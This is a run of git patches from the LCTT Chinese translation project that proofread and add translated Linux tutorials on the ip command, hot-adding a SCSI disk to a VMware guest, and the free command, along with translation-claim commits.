-通过 `ip` 命令还能查看网络的统计信息,比如所有网卡上传输的字节数和报文数,错误或丢弃的报文数等。使用 `ip -s link` 命令来查看
+通过 `ip` 命令还能查看网络的统计信息,比如所有网卡上传输的字节数和报文数,错误或丢弃的报文数等。使用 `ip -s link` 命令来查看:
+
```
[linuxtechi@localhost]$ ip -s link
```
@@ -162,7 +180,8 @@ ARP,是的 `Address Resolution Protocol` 缩写,用于将 IP 地址转换为
### 案例 12:获取帮助
-若你想查看某个上面例子中没有的选项,那么你可以查看帮助。事实上对任何命令你都可以寻求帮助。要列出 `ip` 命令的所有可选项,执行
+若你想查看某个上面例子中没有的选项,那么你可以查看帮助。事实上对任何命令你都可以寻求帮助。要列出 `ip` 命令的所有可选项,执行:
+
```
[linuxtechi@localhost]$ ip help
```
@@ -175,21 +194,21 @@ via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
作者:[Pradeep Kumar][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://www.linuxtechi.com/author/pradeep/
[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
-[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
+[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
-[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
+[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
-[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
+[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
-[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
+[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
-[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
+[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
-[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
+[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
From 9469257f3a013f14ec3b4d264b448ab9601da1e1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 12:22:17 +0800
Subject: [PATCH 286/371] PRF:20090718 Vmware Linux Guest Add a New Hard Disk
Without Rebooting Guest.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@lujun9972 这篇是2009 年的,我没有验证过是否过时,但是选题过于老的文章,要注意看一下。此外,一般情况下,以三级标题开始为宜。
---
...a New Hard Disk Without Rebooting Guest.md | 72 ++++++++++---------
1 file changed, 37 insertions(+), 35 deletions(-)
diff --git a/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
index 6c57fd9090..f25ecbb2dc 100644
--- a/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
+++ b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -1,43 +1,41 @@
在不重启的情况下为 Vmware Linux 客户机添加新硬盘
======
-作为一名系统管理员,我经常需要用额外的硬盘来扩充存储空间或将系统数据从用户数据中分离出来。将物理块设备加到虚拟主机的这个过程,告诉你如何将一个块主机上的硬盘加到一台使用 VMWare 软件虚拟化的 Linux 客户机上。
+作为一名系统管理员,我经常需要用额外的硬盘来扩充存储空间或将系统数据从用户数据中分离出来。我将告诉你在将物理块设备加到虚拟主机的这个过程中,如何将一个主机上的硬盘加到一台使用 VMWare 软件虚拟化的 Linux 客户机上。
-你可以显式的添加或删除一个 SCSI 设备,或者重新扫描整个 SCSI 总线而不用重启 Linux 虚拟机。本指南在 Vmware Server 和 Vmware Workstation v6.0 中通过测试(更老版本应该也支持)。所有命令在 RHEL,Fedora,CentOS 和 Ubuntu Linux 客户机 / 主机操作系统下都经过了测试。
+你可以显式地添加或删除一个 SCSI 设备,或者重新扫描整个 SCSI 总线而不用重启 Linux 虚拟机。本指南在 Vmware Server 和 Vmware Workstation v6.0 中通过测试(更老版本应该也支持)。所有命令在 RHEL、Fedora、CentOS 和 Ubuntu Linux 客户机 / 主机操作系统下都经过了测试。
+### 步骤 1:添加新硬盘到虚拟客户机
-## 步骤 # 1:添加新硬盘到虚拟客户机
-
-首先,通过 vmware 硬件设置菜单添加硬盘。
-点击 VM > Settings
+首先,通过 vmware 硬件设置菜单添加硬盘。点击 “VM > Settings”
![Fig.01:Vmware Virtual Machine Settings ][1]
-或者你也可以按下 CTRL + D 也能进入设置对话框。
+或者你也可以按下 `CTRL + D` 也能进入设置对话框。
-点击 Add+ 添加新硬盘到客户机:
+点击 “Add” 添加新硬盘到客户机:
![Fig.02:VMWare adding a new hardware][2]
-选择硬件类型为 Hard disk 然后点击 Next
+选择硬件类型为“Hard disk”然后点击 “Next”:
![Fig.03 VMware Adding a new disk wizard ][3]
-选择 `create a new virtual disk` 然后点击 Next
+选择 “create a new virtual disk” 然后点击 “Next”:
![Fig.04:Vmware Wizard Disk ][4]
-设置虚拟磁盘类型为 SCSI 然后点击 Next
+设置虚拟磁盘类型为 “SCSI” ,然后点击 “Next”:
![Fig.05:Vmware Virtual Disk][5]
-按需要设置最大磁盘大小,然后点击 Next
+按需要设置最大磁盘大小,然后点击 “Next”:
![Fig.06:Finalizing Disk Virtual Addition ][6]
-最后,选择文件存放位置然后点击 Finish。
+最后,选择文件存放位置然后点击 “Finish”。
-## 步骤 # 2:重新扫描 SCSI 总线,在不重启虚拟机的情况下添加 SCSI 设备
+### 步骤 2:重新扫描 SCSI 总线,在不重启虚拟机的情况下添加 SCSI 设备
输入下面命令重新扫描 SCSI 总线:
@@ -51,7 +49,7 @@ tail -f /var/log/message
![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
-你需要将 `host#` 替换成真实的值,比如 host0。你可以通过下面命令来查出这个值:
+你需要将 `host#` 替换成真实的值,比如 `host0`。你可以通过下面命令来查出这个值:
`# ls /sys/class/scsi_host`
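
例如,假设上一步查到的是 `host0`,那么完整的重新扫描命令大致如下(示例):

```
# echo "- - -" > /sys/class/scsi_host/host0/scan
```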
@@ -108,7 +106,7 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi disk sdc
Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
```
-### 如何删除 =/dev/sdc= 这块设备?
+#### 如何删除 /dev/sdc 这块设备?
除了重新扫描整个总线外,你也可以使用下面命令添加或删除指定磁盘:
@@ -117,7 +115,7 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
# echo 1 > /sys/block/sdc/device/delete
```
-### 如何添加 =/dev/sdc= 这块设备?
+#### 如何添加 /dev/sdc 这块设备?
使用下面语法添加指定设备:
@@ -127,14 +125,12 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
这里,
- * :Host
- * :Bus (Channel)
- * :Target (Id)
- * :LUN numbers
+ * 第一个数字:主机(Host)
+ * 第二个数字:总线(Bus,即通道)
+ * 第三个数字:目标(Target,即 Id)
+ * 第四个数字:LUN 号
-
-
-例如。使用参数 host#0,bus#0,target#2,以及 LUN#0 来添加 /dev/sdc,则输入:
+例如,使用参数 `host#0`、`bus#0`、`target#2` 以及 `LUN#0` 来添加 `/dev/sdc`,则输入:
```
# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
@@ -157,7 +153,7 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
Type: Direct-Access ANSI SCSI revision: 02
```
-## 步骤 #3:格式化新磁盘
+### 步骤 #3:格式化新磁盘
现在使用 [fdisk 并通过 mkfs.ext3][8] 命令创建分区:
@@ -169,13 +165,17 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
# mkfs.ext4 /dev/sdc3
```
-## 步骤 #4:创建挂载点并更新 /etc/fstab
+### 步骤 #4:创建挂载点并更新 /etc/fstab
-`# mkdir /disk3`
+```
+# mkdir /disk3
+```
-打开 /etc/fstab 文件,输入:
+打开 `/etc/fstab` 文件,输入:
-`# vi /etc/fstab`
+```
+# vi /etc/fstab
+```
加入下面这行:
@@ -193,15 +193,17 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
#### 可选操作:为分区加标签
-[你可以使用 e2label 命令为分区加标签 ][9]。假设,你想要为 /backupDisk 这块新分区加标签,则输入
+[你可以使用 e2label 命令为分区加标签][9]。假设你想要为这个新分区加上 `/backupDisk` 这个标签,则输入:
-`# e2label /dev/sdc1 /backupDisk`
+```
+# e2label /dev/sdc1 /backupDisk
+```
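+
+加上标签之后,就可以在 `/etc/fstab` 中用标签来引用这个分区。下面是一行示例(挂载点与文件系统类型均为假设值,请按实际情况修改):
+
+```
+LABEL=/backupDisk    /disk3    ext4    defaults    0 2
+```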
-详情参见 "[Linux 分区的重要性 ][10]
+详情参见 [Linux 分区的重要性][10]。
-## 关于作者
+### 关于作者
-作者即是 nixCraft 的创造者,也是一名经验丰富的系统管理员,还是 Linux 操作系统 /Unix shell 脚本培训师。他曾服务过全球客户并与多个行业合作过,包括 IT,教育,国防和空间研究,以及非盈利机构。你可以在 [Twitter][11],[Facebook][12],[Google+][13] 上关注它。
+作者是 nixCraft 的创始人,也是一名经验丰富的系统管理员、Linux 操作系统/Unix shell 脚本培训师。他曾服务过全球客户,并与 IT、教育、国防和空间研究以及非盈利机构等多个行业合作过。你可以在 [Twitter][11]、[Facebook][12]、[Google+][13] 上关注他。
--------------------------------------------------------------------------------
@@ -209,7 +211,7 @@ via: https://www.cyberciti.biz/tips/vmware-add-a-new-hard-disk-without-rebooting
作者:[Vivek Gite][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 8a65a30b93ca0be73b80ca909513f591622d1819 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 12:22:39 +0800
Subject: [PATCH 287/371] PUB:20090718 Vmware Linux Guest Add a New Hard Disk
Without Rebooting Guest.md
@lujun9972 https://linux.cn/article-9231-1.html
---
...are Linux Guest Add a New Hard Disk Without Rebooting Guest.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md (100%)
diff --git a/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/published/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
similarity index 100%
rename from translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
rename to published/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
From d15e989f0e9bd354cc5ad8451b60ab8dc00295dd Mon Sep 17 00:00:00 2001
From: kimii <2545489745@qq.com>
Date: Sat, 13 Jan 2018 05:08:03 +0000
Subject: [PATCH 288/371] Update 20171019 More ways to examine network
connections on Linux.md
---
...20171019 More ways to examine network connections on Linux.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171019 More ways to examine network connections on Linux.md b/sources/tech/20171019 More ways to examine network connections on Linux.md
index 1583882158..41e19559bf 100644
--- a/sources/tech/20171019 More ways to examine network connections on Linux.md
+++ b/sources/tech/20171019 More ways to examine network connections on Linux.md
@@ -1,3 +1,4 @@
+translating by kimii
More ways to examine network connections on Linux
======
The ifconfig and netstat commands are incredibly useful, but there are many other commands that can help you see what's up with you network on Linux systems. Today's post explores some very handy commands for examining network connections.
From 6ee9c9d48707cbd8cae1a277ac37031cefb1f920 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 14:34:03 +0800
Subject: [PATCH 289/371] Delete 20170925 Linux Free Command Explained for
Beginners (6 Examples).md
---
...nd Explained for Beginners (6 Examples).md | 122 ------------------
1 file changed, 122 deletions(-)
delete mode 100644 sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
deleted file mode 100644
index 5773719420..0000000000
--- a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
+++ /dev/null
@@ -1,122 +0,0 @@
-Translating by jessie-pang
-
-Linux Free Command Explained for Beginners (6 Examples)
-======
-
-Sometimes, while working on the command line in Linux, you might want to quickly take a look at the total available as well as used memory in the system. If you're a Linux newbie, you'll be glad to know there exists a built-in command - dubbed **free** \- that displays this kind of information.
-
-In this tutorial, we will discuss the basics of the free command as well as some of the important features it provides. But before we do that, it's worth sharing that all commands/instructions mentioned here have been tested on Ubuntu 16.04LTS.
-
-### Linux free command
-
-Here's the syntax of the free command:
-
-free [options]
-
-And following is how the tool's man page describes it:
-```
-free displays the total amount of free and used physical and swap memory in the system, as well as
-the buffers and caches used by the kernel. The information is gathered by parsing
-/proc/meminfo.
-```
-
-Following are some Q&A-styled examples that should give you a good idea about how the free command works.
-
-### Q1. How to view used and available memory using free command?
-
-This is very easy. All you have to do is to run the free command without any options.
-
-free
-
-Here's the output the free command produced on my system:
-
-[![view used and available memory using free command][1]][2]
-
-And here's what these columns mean:
-
-[![Free command columns][3]][4]
-
-### Q2. How to change the display metric?
-
-If you want, you can change the display metric of memory figures that the free command produces in output. For example, if you want to display memory in megabytes, you can use the **-m** command line option.
-
-free -m
-
-[![free command display metrics change][5]][6]
-
-Similarly, you can use **-b** for bytes, **-k** for kilobytes, **-m** for megabytes, **-g** for gigabytes, **\--tera** for terabytes.
-
-### Q3. How to display memory figures in human readable form?
-
-The free command also offers an option **-h** through which you can ask the tool to display memory figures in human-readable form.
-
-free -h
-
-With this option turned on, the command decides for itself which display metric to use for individual memory figures. For example, here's how the -h option worked in our case:
-
-[![diplsy data fromm free command in human readable form][7]][8]
-
-### Q4. How to make free display results continuously with time gap?
-
-If you want, you can also have the free command executed in a way that it continuously displays output after a set time gap. For this, use the **-s** command line option. This option requires user to pass a numeric value that will be treated as the number of seconds after which output will be displayed.
-
-For example, to keep a gap of 3 seconds, run the command in the following way:
-
-free -s 3
-
-In this setup, if you want free to run only a set number of times, you can use the **-c** command option, which requires a count value to be passed to it. For example:
-
-free -s 3 -c 5
-
-The aforementioned command will make sure the tool runs 5 times, with a 3 second time gap between each of the tries.
-
-**Note** : This functionality is currently [buggy][9], so we couldn't test it at our end.
-
-### Q5. How to make free use power of 1000 (not 1024) while displaying memory figures?
-
-If you change the display metric to say megabytes (using -m option), but want the figures to be calculated based on power of 1,000 (not 1024), then this can be done using the **\--si** option. For example, the following screenshot shows the difference in output with and without this option:
-
-[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
-
-### Q6. How to make free display total of columns?
-
-If you want free to display a total of all memory figures in each column, then you can use the **-t** command line option.
-
-free -t
-
-Following screenshot shows this command line option in action:
-
-[![How to make free display total of columns][12]][13]
-
-Note the new 'Total' row that's displayed in this case.
-
-### Conclusion
-
-The free command can prove to be an extremely useful tool if you're into system administration. It's easy to understand and use, with many options to customize output. We've covered many useful options in this tutorial. After you're done practicing these, head to the command's [man page][14] for more.
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-free-command/
-
-作者:[Himanshu Arora][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
-[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
-[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
-[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
-[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
-[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
-[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
-[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
-[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
-[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
-[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
-[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
-[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
-[14]:https://linux.die.net/man/1/free
From b7b53846e8346f1ac2f8225a0ffe42abf3638cd9 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 14:38:00 +0800
Subject: [PATCH 290/371] Linux Free Command Explained for Beginners (6
Examples).md
---
...nd Explained for Beginners (6 Examples).md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
new file mode 100644
index 0000000000..279bd0e75d
--- /dev/null
+++ b/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
@@ -0,0 +1,135 @@
+6 个例子让初学者掌握 free 命令
+======
+
+在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
+
+在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
+
+### Linux free 命令
+
+让我们看一下 free 命令的语法:
+
+free [options]
+
+free 命令的 man 手册如是说:
+
+```
+free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
+```
+
+接下来我们用问答的方式了解一下 free 命令是怎么工作的。
+
+### Q1. 怎么用 free 命令查看已使用和未使用的内存?
+
+这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
+
+free
+
+这是 free 命令在我的系统上的输出:
+
+[![view used and available memory using free command][1]][2]
+
+这些列是什么意思呢?
+
+[![Free command columns][3]][4]
+
+total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
+
+used - 已使用的内存(计算公式为:total - free - buffers - cache)
+
+free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
+
+shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
+
+buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
+
+cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
+
+buff/cache - buffers 与 cache 之和
+
+available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
+
+### Q2. 如何更改显示的单位呢?
+
+如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
+
+free -m
+
+[![free command display metrics change][5]][6]
+
+同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
+
+### Q3. 怎么显示可读的结果呢?
+
+free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
+
+free -h
+
+用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
+
+[![diplsy data fromm free command in human readable form][7]][8]
+
+### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
+
+您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
+
+例如,使 free 命令每隔 3 秒执行一次:
+
+free -s 3
+
+如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
+
+free -s 3 -c 5
+
+上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
+
+**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
+
+### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
+
+如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
+
+[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
+
+### Q6. 如何使 free 命令显示每一列的总和?
+
+如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
+
+free -t
+
+如下图所示:
+
+[![How to make free display total of columns][12]][13]
+
+请注意 “Total” 这一行出现了。
+
+### 总结
+
+free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-free-command/
+
+作者:[Himanshu Arora][a]
+译者:[jessie-pang](https://github.com/jessie-pang)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
+[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
+[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
+[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
+[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
+[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
+[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
+[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
+[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
+[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
+[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
+[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
+[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
+[14]:https://linux.die.net/man/1/free
From ec34e69d15631e06a0e22bb4ab0b63ea3973403a Mon Sep 17 00:00:00 2001
From: fan Li <15201710458@163.com>
Date: Sat, 13 Jan 2018 18:46:48 +0800
Subject: [PATCH 291/371] How to find hidden processes and ports on
Linux/Unix/Windows
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
申领翻译
---
... to find hidden processes and ports on Linux-Unix-Windows.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md b/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md
index af18bdc08f..15b667f3d2 100644
--- a/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md
+++ b/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md
@@ -1,3 +1,5 @@
+Translating by ljgibbslf
+
How to find hidden processes and ports on Linux/Unix/Windows
======
Unhide is a little handy forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique. This tool works under Linux, Unix-like system, and MS-Windows operating systems. From the man page:
From ca99416d90debf2925ed1466595056edd52b35d4 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 19:32:34 +0800
Subject: [PATCH 292/371] Delete Linux Free Command Explained for Beginners (6
Examples).md
---
...nd Explained for Beginners (6 Examples).md | 135 ------------------
1 file changed, 135 deletions(-)
delete mode 100644 translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
deleted file mode 100644
index 279bd0e75d..0000000000
--- a/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
+++ /dev/null
@@ -1,135 +0,0 @@
-6 个例子让初学者掌握 free 命令
-======
-
-在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
-
-在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
-
-### Linux free 命令
-
-让我们看一下 free 命令的语法:
-
-free [options]
-
-free 命令的 man 手册如是说:
-
-```
-free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
-```
-
-接下来我们用问答的方式了解一下 free 命令是怎么工作的。
-
-### Q1. 怎么用 free 命令查看已使用和未使用的内存?
-
-这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
-
-free
-
-这是 free 命令在我的系统上的输出:
-
-[![view used and available memory using free command][1]][2]
-
-这些列是什么意思呢?
-
-[![Free command columns][3]][4]
-
-total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
-
-used - 已使用的内存(计算公式为:total - free - buffers - cache)
-
-free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
-
-shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
-
-buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
-
-cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
-
-buff/cache - buffers 与 cache 之和
-
-available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
-
-### Q2. 如何更改显示的单位呢?
-
-如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
-
-free -m
-
-[![free command display metrics change][5]][6]
-
-同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
-
-### Q3. 怎么显示可读的结果呢?
-
-free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
-
-free -h
-
-用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
-
-[![diplsy data fromm free command in human readable form][7]][8]
-
-### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
-
-您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
-
-例如,使 free 命令每隔 3 秒执行一次:
-
-free -s 3
-
-如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
-
-free -s 3 -c 5
-
-上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
-
-**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
-
-### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
-
-如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
-
-[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
-
-### Q6. 如何使 free 命令显示每一列的总和?
-
-如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
-
-free -t
-
-如下图所示:
-
-[![How to make free display total of columns][12]][13]
-
-请注意 “Total” 这一行出现了。
-
-### 总结
-
-free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-free-command/
-
-作者:[Himanshu Arora][a]
-译者:[jessie-pang](https://github.com/jessie-pang)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
